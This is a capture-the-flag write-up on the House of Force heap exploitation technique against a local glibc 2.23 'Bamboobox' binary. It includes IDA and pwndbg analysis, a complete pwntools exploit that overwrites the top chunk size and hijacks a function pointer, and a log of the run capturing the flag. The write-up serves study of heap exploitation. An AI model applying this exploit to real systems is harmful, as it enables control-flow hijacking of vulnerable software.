House Of Force (controlling the top_chunk) (worked example)

Attachment download:

Link: https://pan.baidu.com/s/1DTAyDvfJ9Ri3um6-zxtaBw
Extraction code: xv72

Lab environment

First, look at the Linux environment:

[screenshots: Linux environment]

The Ubuntu version is 16.04 and the libc version is 2.23.

Next, check the file's protections:

[screenshot: file protections]

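Static analysis with IDA

Load the file into IDA and analyze the program flow.

main function

[screenshot: main function]

The main function is the program's overall flow. Note that at startup the program allocates a heap region to store hello_message and goodbye_message; hello_message is called when the program starts and goodbye_message when it exits.

[screenshot: menu function]

The program's menu function.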

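1. show_item function

[screenshot: show_item function]

It first checks whether the global variable num, stored in the bss segment, holds a value, then enters a loop that prints the contents of each of the program's structures.

2. add_item function

Adds a new structure entry to the program:

[screenshot: add_item function]

3. change_item function

[screenshot: change_item function]

This is the vulnerable function: it allows an arbitrary heap overflow.

4. remove_item function

[screenshot: remove_item function]

magic function (target)

[screenshot: magic function]

Our goal is to hijack the program's control flow so that it executes this function.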

Dynamic debugging with pwngdb

Heap memory layout

Create two chunks:

chunk0: size=10, content='aaaaa'

chunk1: size=20, content='bbbbb'

pwndbg> r
Starting program: /root/CTF-PWN/House Of Force/PWN
There is a box with magic
what do you want to do in the box
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:2
Please enter the length of item name:10
Please enter the name of item:aaaaa
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:2
Please enter the length of item name:20
Please enter the name of item:bbbbb
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:^C
Program received signal SIGINT, Interrupt.
0x00007ffff7b04360 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:84
84 ../sysdeps/unix/syscall-template.S: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────
RAX 0xfffffffffffffe00
RBX 0x0
RCX 0x7ffff7b04360 (__read_nocancel+7) ◂— cmp rax, -0xfff
RDX 0x8
RDI 0x0
RSI 0x7fffffffded0 —▸ 0x7fffffff0a32 ◂— 0x0
R8 0x7ffff7fdd700 ◂— 0x7ffff7fdd700
R9 0xc
R10 0x0
R11 0x246
R12 0x4007a0 (_start) ◂— xor ebp, ebp
R13 0x7fffffffdfc0 ◂— 0x1
R14 0x0
R15 0x0
RBP 0x7fffffffdee0 —▸ 0x400ee0 (__libc_csu_init) ◂— push r15
RSP 0x7fffffffdeb8 —▸ 0x400e5d (main+166) ◂— lea rax, [rbp - 0x10]
RIP 0x7ffff7b04360 (__read_nocancel+7) ◂— cmp rax, -0xfff
───────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────
0x7ffff7b04360 <__read_nocancel+7> cmp rax, -0xfff
0x7ffff7b04366 <__read_nocancel+13> jae read+73 <0x7ffff7b04399>

0x7ffff7b04399 <read+73> mov rcx, qword ptr [rip + 0x2ccad8]
0x7ffff7b043a0 <read+80> neg eax
0x7ffff7b043a2 <read+82> mov dword ptr fs:[rcx], eax
0x7ffff7b043a5 <read+85> or rax, 0xffffffffffffffff
0x7ffff7b043a9 <read+89> ret

0x7ffff7b043aa nop word ptr [rax + rax]
0x7ffff7b043b0 <write> cmp dword ptr [rip + 0x2d2389], 0 <0x7ffff7dd6740>
0x7ffff7b043b7 <write+7> jne write+25 <0x7ffff7b043c9>

0x7ffff7b043c9 <write+25> sub rsp, 8
───────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdeb8 —▸ 0x400e5d (main+166) ◂— lea rax, [rbp - 0x10]
01:0008│     0x7fffffffdec0 ◂— 0x200400ee0
02:0010│     0x7fffffffdec8 —▸ 0x603010 —▸ 0x400896 (hello_message) ◂— push rbp
03:0018│ rsi 0x7fffffffded0 —▸ 0x7fffffff0a32 ◂— 0x0
04:0020│     0x7fffffffded8 ◂— 0x9478adcd5746ce00
05:0028│ rbp 0x7fffffffdee0 —▸ 0x400ee0 (__libc_csu_init) ◂— push r15
06:0030│     0x7fffffffdee8 —▸ 0x7ffff7a2d840 (__libc_start_main+240) ◂— mov edi, eax
07:0038│     0x7fffffffdef0 ◂— 0x0
─────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────
► f 0 7ffff7b04360 __read_nocancel+7
f 1 400e5d main+166
f 2 7ffff7a2d840 __libc_start_main+240

Then look at the state of the heap:

pwndbg> heap
0x603000 FASTBIN {
prev_size = 0,
size = 33,
fd = 0x400896 <hello_message>,
bk = 0x4008b1 <goodbye_message>,
fd_nextsize = 0x0,
bk_nextsize = 0x21
}
0x603020 FASTBIN {
prev_size = 0,
size = 33,
fd = 0xa6161616161,
bk = 0x0,
fd_nextsize = 0x0,
bk_nextsize = 0x21
}
0x603040 FASTBIN {
prev_size = 0,
size = 33,
fd = 0xa6262626262,
bk = 0x0,
fd_nextsize = 0x0,
bk_nextsize = 0x20fa1
}
0x603060 PREV_INUSE {
prev_size = 0,
size = 135073,
fd = 0x0,
bk = 0x0,
fd_nextsize = 0x0,
bk_nextsize = 0x0
}

Look at the heap memory:

pwndbg> x/16gx 0x603000
0x603000: 0x0000000000000000 0x0000000000000021 #func_start_malloc_chunk
0x603010: 0x0000000000400896 0x00000000004008b1
0x603020: 0x0000000000000000 0x0000000000000021 #chunk0
0x603030: 0x00000a6161616161 0x0000000000000000
0x603040: 0x0000000000000000 0x0000000000000021 #chunk1
0x603050: 0x00000a6262626262 0x0000000000000000
0x603060: 0x0000000000000000 0x0000000000020fa1 #top_chunk
0x603070: 0x0000000000000000 0x0000000000000000

The chunk at func_start_malloc_chunk is the space the program requests from memory right at startup. Look at the address of malloc_data in IDA:

[screenshot: malloc_data in IDA]

pwndbg> x/16gx 0x0000000000400896
0x400896 <hello_message>: 0x400f68bfe5894855 0x88bffffffe3ce800
#assembly code of hello_message
0x4008a6 <hello_message+16>: 0xfffffe32e800400f 0xbfe5894855c35d90
0x4008b6 <goodbye_message+5>: 0xfffe21e800400faa 0x17e800400fbcbfff
#assembly code of goodbye_message
0x4008c6 <goodbye_message+21>: 0x4855c35d90fffffe 0xe800400fc7bfe589
0x4008d6 <menu+10>: 0x400fe4bffffffe06 0xc7bffffffdfce800
0x4008e6 <menu+26>: 0xfffffdf2e800400f 0xfde8e800400ff3bf
0x4008f6 <menu+42>: 0xe80040100fbfffff 0x401020bffffffdde
0x400906 <menu+58>: 0x3dbffffffdd4e800 0xfffffdcae8004010

So the heap memory looks like this:

pwndbg> x/16gx 0x603000
0x603000: 0x0000000000000000 0x0000000000000021 #func_start_malloc_chunk
0x603010: 0x0000000000400896 0x00000000004008b1
#hello_message #goodbye_message
0x603020: 0x0000000000000000 0x0000000000000021 #chunk0
0x603030: 0x00000a6161616161 0x0000000000000000
0x603040: 0x0000000000000000 0x0000000000000021 #chunk1
0x603050: 0x00000a6262626262 0x0000000000000000
0x603060: 0x0000000000000000 0x0000000000020fa1 #top_chunk
0x603070: 0x0000000000000000 0x0000000000000000

Global variables in the bss segment

Using IDA, look at the global variables in the bss segment:

[screenshots: bss segment global variables in IDA]

num records the number of chunks.

[screenshot]

pwndbg> x/16gx 0x6020c0
0x6020c0 <itemlist>: 0x000000000000000a 0x0000000000603030
#struct_size #struct_content_ptr
0x6020d0 <itemlist+16>: 0x0000000000000014 0x0000000000603050
#struct_size #struct_content_ptr
0x6020e0 <itemlist+32>: 0x0000000000000000 0x0000000000000000
0x6020f0 <itemlist+48>: 0x0000000000000000 0x0000000000000000
0x602100 <itemlist+64>: 0x0000000000000000 0x0000000000000000
0x602110 <itemlist+80>: 0x0000000000000000 0x0000000000000000
0x602120 <itemlist+96>: 0x0000000000000000 0x0000000000000000
0x602130 <itemlist+112>: 0x0000000000000000 0x0000000000000000
//Note: struct_content_ptr points to the malloc_data address returned by malloc

itemlist stores the program's structures.

Attack principle

Our goal is to change the 0x4008b1 (goodbye_message) stored in the heap to the address of the magic function:

Before:
pwndbg> x/16gx 0x603000
0x603000: 0x0000000000000000 0x0000000000000021 #func_start_malloc_chunk
0x603010: 0x0000000000400896 0x00000000004008b1
#hello_message #goodbye_message

After:
pwndbg> x/16gx 0x603000
0x603000: 0x0000000000000000 0x0000000000000021 #func_start_malloc_chunk
0x603010: 0x0000000000400896 0x0000000000400d49
#hello_message #magic function

Automating the program's menu functions

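# Menu helpers; p is the pwntools process object for ./PWN (see the full EXP).
def cmd(choice):
    p.sendlineafter('', str(choice))            # pick a menu option

def create(size, content):
    cmd(2)                                       # 2.add a new item
    p.sendlineafter('item name:', str(size))
    p.sendlineafter('item:', content)

def edit(index, size, content):
    cmd(3)                                       # 3.change the item in the box
    p.sendlineafter('of item:', str(index))
    p.sendlineafter('item name:', str(size))
    p.sendlineafter('the item:', content)

def delete(index):
    cmd(4)                                       # 4.remove the item in the box
    p.sendlineafter('of item:', str(index))

def quit():
    cmd(5)                                       # 5.exit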

Next:

create(0x30,"aaaa")

Under gdb, the program's memory layout is as follows:

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x400000 0x402000 r-xp 2000 0
0x601000 0x602000 r--p 1000 1000
0x602000 0x603000 rw-p 1000 2000
0x603000 0x624000 rw-p 21000 0 [heap]
0x7ffff7a0d000 0x7ffff7bcd000 r-xp 1c0000 0 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ffff7bcd000 0x7ffff7dcd000 ---p 200000 1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ffff7dcd000 0x7ffff7dd1000 r--p 4000 1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ffff7dd1000 0x7ffff7dd3000 rw-p 2000 1c4000 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ffff7dd3000 0x7ffff7dd7000 rw-p 4000 0
0x7ffff7dd7000 0x7ffff7dfd000 r-xp 26000 0 /lib/x86_64-linux-gnu/ld-2.23.so
0x7ffff7fdc000 0x7ffff7fdf000 rw-p 3000 0
0x7ffff7ff7000 0x7ffff7ffa000 r--p 3000 0 [vvar]
0x7ffff7ffa000 0x7ffff7ffc000 r-xp 2000 0 [vdso]
0x7ffff7ffc000 0x7ffff7ffd000 r--p 1000 25000 /lib/x86_64-linux-gnu/ld-2.23.so
0x7ffff7ffd000 0x7ffff7ffe000 rw-p 1000 26000 /lib/x86_64-linux-gnu/ld-2.23.so
0x7ffff7ffe000 0x7ffff7fff000 rw-p 1000 0
0x7ffffffde000 0x7ffffffff000 rw-p 21000 0 [stack]
0xffffffffff600000 0xffffffffff601000 r-xp 1000 0 [vsyscall]

After running the payload above, the chunks look like this:

pwndbg> x/30gx 0x603000
0x603000: 0x0000000000000000 0x0000000000000021 #func_start_malloc_chunk
0x603010: 0x0000000000400896 0x00000000004008b1
#hello_message #goodbye_message
0x603020: 0x0000000000000000 0x0000000000000041 #chunk0(malloc(0x30))
0x603030: 0x0000000a61616161 0x0000000000000000
0x603040: 0x0000000000000000 0x0000000000000000
0x603050: 0x0000000000000000 0x0000000000000000
0x603060: 0x0000000000000000 0x0000000000020fa1 #top_chunk
0x603070: 0x0000000000000000 0x0000000000000000
0x603080: 0x0000000000000000 0x0000000000000000
0x603090: 0x0000000000000000 0x0000000000000000
0x6030a0: 0x0000000000000000 0x0000000000000000
0x6030b0: 0x0000000000000000 0x0000000000000000
0x6030c0: 0x0000000000000000 0x0000000000000000
0x6030d0: 0x0000000000000000 0x0000000000000000
0x6030e0: 0x0000000000000000 0x0000000000000000

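Then edit the chunk just created:

# 0x30 bytes fill chunk0's data, 8 bytes cover the top chunk's prev_size, then the new size field
content=b'a'*0x30+b'1'*8+p64(0xffffffffffffffff)
edit(0,0x40,content)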

Look at the chunks again:

pwndbg> x/30gx 0x603000
0x603000: 0x0000000000000000 0x0000000000000021 #func_start_malloc_chunk
0x603010: 0x0000000000400896 0x00000000004008b1
#hello_message #goodbye_message
0x603020: 0x0000000000000000 0x0000000000000039 #chunk0(malloc(0x30))
0x603030: 0x6161616161616161 0x6161616161616161
0x603040: 0x6161616161616161 0x6161616161616161
0x603050: 0x6161616161616161 0x6161616161616161
0x603060: 0x3131313131313131 0xffffffffffffffff #top_chunk
0x603070: 0x0000000000000000 0x0000000000000000
0x603080: 0x0000000000000000 0x0000000000000000
0x603090: 0x0000000000000000 0x0000000000000000
0x6030a0: 0x0000000000000000 0x0000000000000000
0x6030b0: 0x0000000000000000 0x0000000000000000
0x6030c0: 0x0000000000000000 0x0000000000000000
0x6030d0: 0x0000000000000000 0x0000000000000000
0x6030e0: 0x0000000000000000 0x0000000000000000

As you can see, the size of the top_chunk has been changed to 0xffffffffffffffff; with it we can control memory at an arbitrary address.

Next, run:

offset=-0x60-0x10
create(offset,'1234')

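This offset is new_top_chunk_addr - old_top_chunk_addr - 0x10,

that is, 0x603000 - 0x603060 - 0x10 = -0x70.

This is how HOF is used to take control of memory at a lower address. Once this step has run, the top_chunk points to 0x603000, so the next chunk allocation returns the memory where goodbye_message is stored.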
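The arithmetic behind this step, as an added C model that is not part of the original post and not glibc's own source: it reproduces the top-chunk size test and pointer update with the addresses from the dumps above, and shows that the top-size sanity check present since glibc 2.29 rejects the corrupted size. The function and type names are hypothetical, and system_mem is assumed to equal the 0x21000-byte heap mapping shown by vmmap.

```c
#include <stdint.h>
#include <stdio.h>

#define SIZE_SZ    8u    /* sizeof(size_t) on x86-64 */
#define ALIGN_MASK 15u   /* MALLOC_ALIGN_MASK */
#define MINSIZE    32u   /* smallest chunk */
#define FLAG_BITS  7u    /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

typedef enum { SPLIT_TOP, NEEDS_SYSMALLOC, REJECT_REQUEST, ABORT_CORRUPT_TOP } outcome_t;
typedef struct { outcome_t outcome; uint64_t new_top, new_top_head; } result_t;

/* Simplified model of serving a request from the top chunk in _int_malloc.
 * check_top = 0: glibc 2.23 behaviour (the libc used on this page).
 * check_top = 1: adds the "corrupted top size" check present since glibc 2.29. */
static result_t alloc_from_top(uint64_t top, uint64_t top_head, uint64_t system_mem,
                               uint64_t request, int check_top)
{
    result_t r = { REJECT_REQUEST, top, top_head };
    /* checked_request2size: refuse requests that would wrap when padded */
    if (request >= (uint64_t)0 - 2 * MINSIZE)
        return r;
    uint64_t nb = (request + SIZE_SZ + ALIGN_MASK) & ~(uint64_t)ALIGN_MASK;
    if (nb < MINSIZE)
        nb = MINSIZE;
    uint64_t size = top_head & ~(uint64_t)FLAG_BITS;      /* chunksize(top) */
    if (check_top && size > system_mem) {
        r.outcome = ABORT_CORRUPT_TOP;                    /* malloc aborts here */
        return r;
    }
    if (size < nb + MINSIZE) {
        r.outcome = NEEDS_SYSMALLOC;                      /* top too small */
        return r;
    }
    r.outcome = SPLIT_TOP;
    r.new_top = top + nb;               /* unsigned wrap-around moves top to a lower address */
    r.new_top_head = (size - nb) | 1;   /* remainder size with PREV_INUSE */
    return r;
}

int main(void)
{
    const uint64_t top = 0x603060, sysmem = 0x21000;  /* from the dumps and vmmap above */
    const uint64_t req = (uint64_t)-0x70;             /* the length "-112" as size_t */
    result_t intact  = alloc_from_top(top, 0x20fa1, sysmem, req, 0);
    result_t corrupt = alloc_from_top(top, UINT64_MAX, sysmem, req, 0);
    result_t checked = alloc_from_top(top, UINT64_MAX, sysmem, req, 1);
    printf("intact top:      outcome=%d\n", intact.outcome);
    printf("corrupted top:   outcome=%d new_top=0x%llx head=0x%llx\n", corrupt.outcome,
           (unsigned long long)corrupt.new_top, (unsigned long long)corrupt.new_top_head);
    printf("with 2.29 check: outcome=%d\n", checked.outcome);
    return 0;
}
```

Feeding the corrupted-top result back in with a 0x10-byte request gives a new top at 0x603020 with head 0x39, which is the value the page's dumps show at 0x603028.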

pwndbg> x/30gx 0x603000
0x603000: 0x0000000000000000 0x0000000000000021 #new_top_chunk
0x603010: 0x0000000000400d49 0x0000000000400d49
#hello_message #goodbye_message
0x603020: 0x0000000000000000 0x0000000000000039 #chunk0(malloc(0x30))
0x603030: 0x6161616161616161 0x6161616161616161
0x603040: 0x6161616161616161 0x6161616161616161
0x603050: 0x6161616161616161 0x6161616161616161
0x603060: 0x3131313131313131 0xffffffffffffffa1 #old_top_chunk
0x603070: 0x0000000000000000 0x0000000000000000

At this point we can control the goodbye_message address; after overwriting it, exiting the program triggers the magic function.

create(0x10,p64(magic)*2)
#gdb.attach(p)
#quit()

pwndbg> x/30gx 0x603000
0x603000: 0x0000000000000000 0x0000000000000021 #the chunk now under our control
0x603010: 0x0000000000400d49 0x0000000000400d49
#magic #magic
0x603020: 0x0000000000000000 0x0000000000000039 #chunk0(malloc(0x30))
0x603030: 0x6161616161616161 0x6161616161616161
0x603040: 0x6161616161616161 0x6161616161616161
0x603050: 0x6161616161616161 0x6161616161616161
0x603060: 0x3131313131313131 0xffffffffffffffa1 #top_chunk
0x603070: 0x0000000000000000 0x0000000000000000
0x603080: 0x0000000000000000 0x0000000000000000

EXP

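from pwn import *
context.log_level = 'debug'
p = process('./PWN')

def cmd(choice):
    p.sendlineafter('', str(choice))            # pick a menu option

def create(size, content):
    cmd(2)                                       # 2.add a new item
    p.sendlineafter('item name:', str(size))
    p.sendlineafter('item:', content)

def edit(index, size, content):
    cmd(3)                                       # 3.change the item in the box
    p.sendlineafter('of item:', str(index))
    p.sendlineafter('item name:', str(size))
    p.sendlineafter('the item:', content)

def delete(index):
    cmd(4)                                       # 4.remove the item in the box
    p.sendlineafter('of item:', str(index))

def quit():
    cmd(5)                                       # 5.exit

magic = 0x400d49
create(0x30, "aaaa")                             # chunk0, directly below the top_chunk
# 0x30 bytes fill chunk0's data, 8 bytes cover the top chunk's prev_size, then the new size field
content = b'a'*0x30 + b'1'*8 + p64(0xffffffffffffffff)
edit(0, 0x40, content)
offset = -0x60-0x10                              # new_top_chunk_addr - old_top_chunk_addr - 0x10
create(offset, '1234')                           # moves the top_chunk to 0x603000
create(0x10, p64(magic)*2)                       # lands on hello_message/goodbye_message
#gdb.attach(p)
quit()                                           # exit calls the overwritten goodbye_message
p.interactive()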

debug-exp

root@ubuntu:~/CTF-PWN/House Of Force# python exp.py
[+] Starting local process './PWN': pid 23325
[DEBUG] Received 0x11c bytes:
'There is a box with magic\n'
'what do you want to do in the box\n'
'----------------------------\n'
'Bamboobox Menu\n'
'----------------------------\n'
'1.show the items in the box\n'
'2.add a new item\n'
'3.change the item in the box\n'
'4.remove the item in the box\n'
'5.exit\n'
'----------------------------\n'
'Your choice:'
[DEBUG] Sent 0x2 bytes:
'2\n'
[DEBUG] Received 0x25 bytes:
'Please enter the length of item name:'
[DEBUG] Sent 0x3 bytes:
'48\n'
[DEBUG] Received 0x1e bytes:
'Please enter the name of item:'
[DEBUG] Sent 0x5 bytes:
'aaaa\n'
[DEBUG] Received 0xe0 bytes:
'----------------------------\n'
'Bamboobox Menu\n'
'----------------------------\n'
'1.show the items in the box\n'
'2.add a new item\n'
'3.change the item in the box\n'
'4.remove the item in the box\n'
'5.exit\n'
'----------------------------\n'
'Your choice:'
[DEBUG] Sent 0x2 bytes:
'3\n'
[DEBUG] Received 0x1f bytes:
'Please enter the index of item:'
[DEBUG] Sent 0x2 bytes:
'0\n'
[DEBUG] Received 0x25 bytes:
'Please enter the length of item name:'
[DEBUG] Sent 0x3 bytes:
'64\n'
[DEBUG] Received 0x26 bytes:
'Please enter the new name of the item:'
[DEBUG] Sent 0x41 bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
00000030 31 31 31 31 31 31 31 31 ff ff ff ff ff ff ff ff │1111│1111│····│····│
00000040 0a │·│
00000041
[DEBUG] Received 0x1d2 bytes:
'----------------------------\n'
'Bamboobox Menu\n'
'----------------------------\n'
'1.show the items in the box\n'
'2.add a new item\n'
'3.change the item in the box\n'
'4.remove the item in the box\n'
'5.exit\n'
'----------------------------\n'
'Your choice:invaild choice!!!\n'
'----------------------------\n'
'Bamboobox Menu\n'
'----------------------------\n'
'1.show the items in the box\n'
'2.add a new item\n'
'3.change the item in the box\n'
'4.remove the item in the box\n'
'5.exit\n'
'----------------------------\n'
'Your choice:'
[DEBUG] Sent 0x2 bytes:
'2\n'
[DEBUG] Received 0x25 bytes:
'Please enter the length of item name:'
[DEBUG] Sent 0x5 bytes:
'-112\n'
[DEBUG] Received 0xfe bytes:
'Please enter the name of item:----------------------------\n'
'Bamboobox Menu\n'
'----------------------------\n'
'1.show the items in the box\n'
'2.add a new item\n'
'3.change the item in the box\n'
'4.remove the item in the box\n'
'5.exit\n'
'----------------------------\n'
'Your choice:'
[DEBUG] Sent 0x5 bytes:
'1234\n'
[DEBUG] Sent 0x2 bytes:
'2\n'
[DEBUG] Received 0x117 bytes:
'invaild choice!!!\n'
'----------------------------\n'
'Bamboobox Menu\n'
'----------------------------\n'
'1.show the items in the box\n'
'2.add a new item\n'
'3.change the item in the box\n'
'4.remove the item in the box\n'
'5.exit\n'
'----------------------------\n'
'Your choice:Please enter the length of item name:'
[DEBUG] Sent 0x3 bytes:
'16\n'
[DEBUG] Received 0x1e bytes:
'Please enter the name of item:'
[DEBUG] Sent 0x11 bytes:
00000000 49 0d 40 00 00 00 00 00 49 0d 40 00 00 00 00 00 │I·@·│····│I·@·│····│
00000010 0a │·│
00000011
[DEBUG] Received 0x1d2 bytes:
'----------------------------\n'
'Bamboobox Menu\n'
'----------------------------\n'
'1.show the items in the box\n'
'2.add a new item\n'
'3.change the item in the box\n'
'4.remove the item in the box\n'
'5.exit\n'
'----------------------------\n'
'Your choice:invaild choice!!!\n'
'----------------------------\n'
'Bamboobox Menu\n'
'----------------------------\n'
'1.show the items in the box\n'
'2.add a new item\n'
'3.change the item in the box\n'
'4.remove the item in the box\n'
'5.exit\n'
'----------------------------\n'
'Your choice:'
[DEBUG] Sent 0x2 bytes:
'5\n'
[*] Switching to interactive mode
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:invaild choice!!!
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:[*] Process './PWN' stopped with exit code 0 (pid 23325)
[DEBUG] Received 0x15 bytes:
'flag{house_of_force}\n'
flag{house_of_force}
[*] Got EOF while reading in interactive
$